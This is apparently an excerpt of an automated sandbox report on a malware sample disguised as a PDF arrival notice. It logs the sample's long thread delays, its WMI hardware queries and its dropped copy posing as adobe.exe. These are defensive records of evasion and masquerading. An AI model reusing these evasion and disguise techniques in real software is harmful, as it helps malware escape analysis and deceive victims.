Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -594469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -594359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -594250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -594141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5280	Thread sleep count: 2785 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -599889s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5280	Thread sleep count: 5978 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -599667s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -599557s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -599124s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -599016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -597981s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -597766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -596078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -595941s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -595640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -595527s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -595402s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -595289s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -595172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -595061s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -594934s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -594823s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -594717s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2948	Thread sleep time: -594606s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5112	Thread sleep count: 6550 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5112	Thread sleep count: 3298 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -599694s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -599586s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -599450s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -599329s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -599198s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -598640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -598093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -597080s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -596953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -596843s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -596723s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -595844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -594640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -594531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5192	Thread sleep time: -594421s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 598873	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 598513	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 598380	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 598182	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596863	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596504	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595685	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595575	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595450	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595339	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 594905	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599889	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599667	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599557	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597981	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595941	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595527	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595402	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595289	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595061	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594934	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594823	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594717	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594606	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599694	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599586	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599450	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599329	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599198	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597984	Jump to behavior
